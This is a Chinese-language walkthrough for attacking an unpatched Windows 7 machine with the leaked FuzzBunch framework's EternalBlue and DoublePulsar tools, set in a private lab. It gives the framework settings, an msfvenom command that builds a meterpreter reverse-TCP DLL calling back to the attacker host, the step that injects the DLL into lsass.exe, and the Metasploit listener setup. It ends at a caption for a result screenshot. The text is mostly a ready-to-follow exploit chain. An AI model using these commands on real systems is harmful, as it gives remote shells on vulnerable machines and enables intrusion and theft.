ShadowBroker攻击框架FuzzBunch实战之EternalBlue

环境准备：

IP地址 角色 操作系统 必需依赖 备注 192.168.119.164 靶机 Win7 SP1 64-bits \ 关闭防火墙，保证没有2017年微软系统补丁 192.168.119.153 攻击机（主） WinXP SP3 32-bits Python2.6.6和pywin32安装包 python 2.6别太老，否则没有Scripts目录安装pywin32模块 192.168.119.152 攻击机（辅助） kali1-amd64 \ 用来生成payload,这里主要是使用msf生成的dll后门

攻击方法：

在xp上用命令行进入fb.py所在的目录，运行fuzzbunch.

C:\Documents and Settings\Administrator>cd c:\TDDOWNLOAD\master\shadowbroker-master\windows\C:\TDDOWNLOAD\master\shadowbroker-master\windows>python fb.py

设置全局参数

1. Default Target IP Address（默认靶机IP）: 192.168.119.164
2. Default Callback IP Address（默认监控主机IP）: 192.168.119.152
3. Use Redirection（使用重定向）: no
4. Set LogDir（设置日志路径）: c:\logs\

使用EternalBlue攻击靶机，这里需要注意的是，事先要确定靶机的操作系统，这个类型要做选择。

另外就是攻击方式，需要选择FB

生成反弹shell用的dll文件

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.119.152 LPORT=8089 -f dll >reverser_tcp_64.dll

使用DoublePulsar攻击靶机
这次要准备攻击负载，这里使用的是dll反弹shell。与EternalBlue一样，需要选择靶机系统类型。

切记， ProcessName [lsass.exe]者一项是默认，否则无法运行后门。

进入Kali，开启监听
监听shell的主机要在反弹shell前启动才能收到反弹的shell。

use exploit/multi/Display all 234 possibilities? (y or n)msf > use exploit/multi/handler msf exploit(handler) > set LHOST 192.168.119.152LHOST => 192.168.119.152msf exploit(handler) > set LPORT 8089LPORT => 8089msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcpPAYLOAD => windows/x64/meterpreter/reverse_tcpmsf exploit(handler) > exploit 

攻击成功效果图：